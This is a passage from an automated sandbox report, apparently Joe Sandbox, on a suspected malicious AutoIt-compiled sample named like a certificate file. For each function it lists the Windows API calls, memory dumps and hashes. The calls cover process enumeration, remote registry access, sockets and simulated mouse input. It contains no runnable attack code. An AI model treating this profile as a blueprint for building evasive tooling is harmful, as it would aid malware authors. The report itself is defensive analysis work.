                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006008F2
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00600918
                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 0060091B
                                                                                    • SysAllocString.OLEAUT32(?), ref: 00600939
                                                                                    • SysFreeString.OLEAUT32(?), ref: 00600942
                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00600967
                                                                                    • SysAllocString.OLEAUT32(?), ref: 00600975
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                    • String ID:
                                                                                    • API String ID: 3761583154-0
                                                                                    • Opcode ID: 82ed6a0a9ba51bcba079a486799f3d3e9fe6b22518c8d9ed4ab27728ab5e637a
                                                                                    • Instruction ID: 52f90d285ff2dd6dab38b692e837df74080ad0e45609630b6a0316bd77dab9a8
                                                                                    • Opcode Fuzzy Hash: 82ed6a0a9ba51bcba079a486799f3d3e9fe6b22518c8d9ed4ab27728ab5e637a
                                                                                    • Instruction Fuzzy Hash: 24215676601219AFEB149F68DC88EEB77EDFF09360B009126F919DB291D670EC458760
                                                                                    Function 00602472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: __wcsnicmp
                                                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                    • API String ID: 1038674560-2734436370
                                                                                    • Opcode ID: 2709ae02aa038db3628e0399c64f1386ec750d4c7bdfb21b08c5699d225b4031
                                                                                    • Instruction ID: 29475f892c041b59ec9edd9870115dce2c7e4adee27825ce1b721c805cdf06db
                                                                                    • Opcode Fuzzy Hash: 2709ae02aa038db3628e0399c64f1386ec750d4c7bdfb21b08c5699d225b4031
                                                                                    • Instruction Fuzzy Hash: DD216D7118455367C239AB24DC2EEB777DAFF95300F504026F486972C1E6619992C399
                                                                                    Function 00600986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006009CB
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006009F1
                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 006009F4
                                                                                    • SysAllocString.OLEAUT32 ref: 00600A15
                                                                                    • SysFreeString.OLEAUT32 ref: 00600A1E
                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00600A38
                                                                                    • SysAllocString.OLEAUT32(?), ref: 00600A46
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                    • String ID:
                                                                                    • API String ID: 3761583154-0
                                                                                    • Opcode ID: d45d5bc59e301fcc5dcec8493397856fd4949e3dad0bdd4d54571ab4eb8acc26
                                                                                    • Instruction ID: 0fba4298728d353391861f3313a6b13d3ddf3a320882f41be7fcf6620194cc1a
                                                                                    • Opcode Fuzzy Hash: d45d5bc59e301fcc5dcec8493397856fd4949e3dad0bdd4d54571ab4eb8acc26
                                                                                    • Instruction Fuzzy Hash: 6F216279600204BFEB149FA8DC88DAB77EDEF49360B008125F909CB2A1DA70EC418764
                                                                                    Function 0062A2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005DD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 005DD1BA
                                                                                      • Part of subcall function 005DD17C: GetStockObject.GDI32(00000011), ref: 005DD1CE
                                                                                      • Part of subcall function 005DD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 005DD1D8
                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0062A32D
                                                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0062A33A
                                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0062A345
                                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0062A354
                                                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0062A360
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                                    • String ID: Msctls_Progress32
                                                                                    • API String ID: 1025951953-3636473452
                                                                                    • Opcode ID: a556963091297b1ab53d5004f8159cbbb06fa05e80f77c6182f7e2b4717b77ca
                                                                                    • Instruction ID: aa34a18bc7e6fe5691bac384f1635568a6887602c485e2423e39225543fcf61d
                                                                                    • Opcode Fuzzy Hash: a556963091297b1ab53d5004f8159cbbb06fa05e80f77c6182f7e2b4717b77ca
                                                                                    • Instruction Fuzzy Hash: 341193B1150129BFEF119FA4DC85EE77F6EFF09798F014115BA08A6160C7729C22DBA4
                                                                                    Function 005DCCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetClientRect.USER32(?,?), ref: 005DCCF6
                                                                                    • GetWindowRect.USER32(?,?), ref: 005DCD37
                                                                                    • ScreenToClient.USER32(?,?), ref: 005DCD5F
                                                                                    • GetClientRect.USER32(?,?), ref: 005DCE8C
                                                                                    • GetWindowRect.USER32(?,?), ref: 005DCEA5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Rect$Client$Window$Screen
                                                                                    • String ID:
                                                                                    • API String ID: 1296646539-0
                                                                                    • Opcode ID: 432e2bee93f82034fd365c81bfb5cf73c403343a622f75601eb52b524677cb0d
                                                                                    • Instruction ID: 04962b562b258cd8cca6b9f312edbac2f2d32b01401d7ab2de80169dfdd5c79a
                                                                                    • Opcode Fuzzy Hash: 432e2bee93f82034fd365c81bfb5cf73c403343a622f75601eb52b524677cb0d
                                                                                    • Instruction Fuzzy Hash: F4B13B7990024ADBDF24CFA8C5807EDBBB6FF08310F14956AEC59AB350DB31A950DB64
                                                                                    Function 00621BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00621C18
                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00621C26
                                                                                    • __wsplitpath.LIBCMT ref: 00621C54
                                                                                      • Part of subcall function 005E1DFC: __wsplitpath_helper.LIBCMT ref: 005E1E3C
                                                                                    • _wcscat.LIBCMT ref: 00621C69
                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00621CDF
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00621CF1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                    • String ID:
                                                                                    • API String ID: 1380811348-0
                                                                                    • Opcode ID: 1b2d61767df7d69880f6b7ba5d75ac6253734956734e486fa755ecb0bfc64489
                                                                                    • Instruction ID: 1e1477eb724886a35075e839d0747c1be0ba1c547cd937cca80a6f08e6566e8c
                                                                                    • Opcode Fuzzy Hash: 1b2d61767df7d69880f6b7ba5d75ac6253734956734e486fa755ecb0bfc64489
                                                                                    • Instruction Fuzzy Hash: BD518D71508341AFD320EF64D885EABBBE8FF89754F00491EF58997291EB309A04CB92
                                                                                    Function 00622FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00623C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00622BB5,?,?), ref: 00623C1D
                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006230AF
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006230EF
                                                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00623112
                                                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0062313B
                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0062317E
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0062318B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                    • String ID:
                                                                                    • API String ID: 3451389628-0
                                                                                    • Opcode ID: deb7ca46d5867086b13270fda98282d1b3d17019227e1541ca45393897fd9368
                                                                                    • Instruction ID: 2a293b06657b5662d925cfedc073923a8e478b8704e06363eb552dc4391fbcbb
                                                                                    • Opcode Fuzzy Hash: deb7ca46d5867086b13270fda98282d1b3d17019227e1541ca45393897fd9368
                                                                                    • Instruction Fuzzy Hash: 05516831604311AFC704EFA4C889EAABBFAFF89704F04491DF545872A1DB75EA15CB52
                                                                                    Function 006284DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetMenu.USER32(?), ref: 00628540
                                                                                    • GetMenuItemCount.USER32(00000000), ref: 00628577
                                                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0062859F
                                                                                    • GetMenuItemID.USER32(?,?), ref: 0062860E
                                                                                    • GetSubMenu.USER32(?,?), ref: 0062861C
                                                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 0062866D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$Item$CountMessagePostString
                                                                                    • String ID:
                                                                                    • API String ID: 650687236-0
                                                                                    • Opcode ID: d3f30d19eecf07008026c10f24ea081d8e48c3897fa670d0b3409382bc264c14
                                                                                    • Instruction ID: ee3f52d50523b4585a4fb344caaf6dc6da62c8e2ebdc11004c42f0c16734b1da
                                                                                    • Opcode Fuzzy Hash: d3f30d19eecf07008026c10f24ea081d8e48c3897fa670d0b3409382bc264c14
                                                                                    • Instruction Fuzzy Hash: 38518B75E01625AFCB15EFA4D845AAEBBF6BF88310F104459E905BB391CB70AE418F90
                                                                                    Function 00604AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00604B10
                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00604B5B
                                                                                    • IsMenu.USER32(00000000), ref: 00604B7B
                                                                                    • CreatePopupMenu.USER32 ref: 00604BAF
                                                                                    • GetMenuItemCount.USER32(000000FF), ref: 00604C0D
                                                                                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00604C3E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                    • String ID:
                                                                                    • API String ID: 3311875123-0
                                                                                    • Opcode ID: 8d9ded3102cd7d9ac2830989c1455fc0344c8a598b74d266aa5ab9c10c4e0b75
                                                                                    • Instruction ID: bb139502b34fc500cdc2e5f760cbb6fe7ba46276f30d280236aa6b3c5a1546c5
                                                                                    • Opcode Fuzzy Hash: 8d9ded3102cd7d9ac2830989c1455fc0344c8a598b74d266aa5ab9c10c4e0b75
                                                                                    • Instruction Fuzzy Hash: 4851E1B0641209EBEF38CF64C888BEFBBF6AF45314F144159E6159B2D0DB709940CB51
                                                                                    Function 00618DE2 Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0065DC00), ref: 00618E7C
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00618E89
                                                                                    • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00618EAD
                                                                                    • #16.WSOCK32(?,?,00000000,00000000), ref: 00618EC5
                                                                                    • _strlen.LIBCMT ref: 00618EF7
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00618F6A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$_strlenselect
                                                                                    • String ID:
                                                                                    • API String ID: 2217125717-0
                                                                                    • Opcode ID: 10a325613a1895d8b24fcb42c6cd4b168aba0845bf14f29b7efe2991c773dc1c
                                                                                    • Instruction ID: 5869f79cf67bf377f6cca2c125ae7b23f1adfc0afb7dbc4d1bb7caf0d08b9d6a
                                                                                    • Opcode Fuzzy Hash: 10a325613a1895d8b24fcb42c6cd4b168aba0845bf14f29b7efe2991c773dc1c
                                                                                    • Instruction Fuzzy Hash: D841C171900205AFCB14EBA4CD89EEEBBBAAF88354F144259F51A972D1DF309E41CB20
                                                                                    Function 005DABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005DB34E: GetWindowLongW.USER32(?,000000EB), ref: 005DB35F
                                                                                    • BeginPaint.USER32(?,?,?), ref: 005DAC2A
                                                                                    • GetWindowRect.USER32(?,?), ref: 005DAC8E
                                                                                    • ScreenToClient.USER32(?,?), ref: 005DACAB
                                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 005DACBC
                                                                                    • EndPaint.USER32(?,?,?,?,?), ref: 005DAD06
                                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0063E673
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                                    • String ID:
                                                                                    • API String ID: 2592858361-0
                                                                                    • Opcode ID: d5c0edbdfe10262ee67c593341abe8a2b70f94f52c35513f48839e7d05c7fd50
                                                                                    • Instruction ID: 9182bcc714471636783295c226e1ac848e4df865080a7bd6d4e6b501c77c5589
                                                                                    • Opcode Fuzzy Hash: d5c0edbdfe10262ee67c593341abe8a2b70f94f52c35513f48839e7d05c7fd50
                                                                                    • Instruction Fuzzy Hash: 5041A270505201AFC720DF28DC84FB77FAAFB56320F14066AF9A48B2A1D7319D85DB62
                                                                                    Function 0062E397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ShowWindow.USER32(00681628,00000000,00681628,00000000,00000000,00681628,?,0063DC5D,00000000,?,00000000,00000000,00000000,?,0063DAD1,00000004), ref: 0062E40B
                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 0062E42F
                                                                                    • ShowWindow.USER32(00681628,00000000), ref: 0062E48F
                                                                                    • ShowWindow.USER32(00000000,00000004), ref: 0062E4A1
                                                                                    • EnableWindow.USER32(00000000,00000001), ref: 0062E4C5
                                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0062E4E8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 642888154-0
                                                                                    • Opcode ID: 27b08b2689b15b5b5695b8c3c7a9270da658d3489de4fc3a5982b1e68af6defd
                                                                                    • Instruction ID: ec99c16f85186f34ca2e51ec1bc1f18513dff3bd2052d24f517e9854210776cd
                                                                                    • Opcode Fuzzy Hash: 27b08b2689b15b5b5695b8c3c7a9270da658d3489de4fc3a5982b1e68af6defd
                                                                                    • Instruction Fuzzy Hash: 0B416134601950EFDB26DF24D499BD47BE2BF0A304F1841B9EA588F2A2C732A845CF51
                                                                                    Function 006098BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 006098D1
                                                                                      • Part of subcall function 005DF4EA: std::exception::exception.LIBCMT ref: 005DF51E
                                                                                      • Part of subcall function 005DF4EA: __CxxThrowException@8.LIBCMT ref: 005DF533
                                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00609908
                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00609924
                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0060999E
                                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 006099B3
                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 006099D2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                                                    • String ID:
                                                                                    • API String ID: 2537439066-0
                                                                                    • Opcode ID: 0d6a6daae3361f4752e10c87c0181834c8978333829dfd41eb62931165e721fa
                                                                                    • Instruction ID: 39a9578d1512b4d567f1238b031eb81b3e26d17ed782b0f1c7eabc319f247bbd
                                                                                    • Opcode Fuzzy Hash: 0d6a6daae3361f4752e10c87c0181834c8978333829dfd41eb62931165e721fa
                                                                                    • Instruction Fuzzy Hash: 98316371900105ABDB14EF98DC89EAF7B7AFF85710B1440BAF905AB286D770DA10CBA0
                                                                                    Function 00619B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,006177F4,?,?,00000000,00000001), ref: 00619B53
                                                                                      • Part of subcall function 00616544: GetWindowRect.USER32(?,?), ref: 00616557
                                                                                    • GetDesktopWindow.USER32 ref: 00619B7D
                                                                                    • GetWindowRect.USER32(00000000), ref: 00619B84
                                                                                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00619BB6
                                                                                      • Part of subcall function 00607A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00607AD0
                                                                                    • GetCursorPos.USER32(?), ref: 00619BE2
                                                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00619C44
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
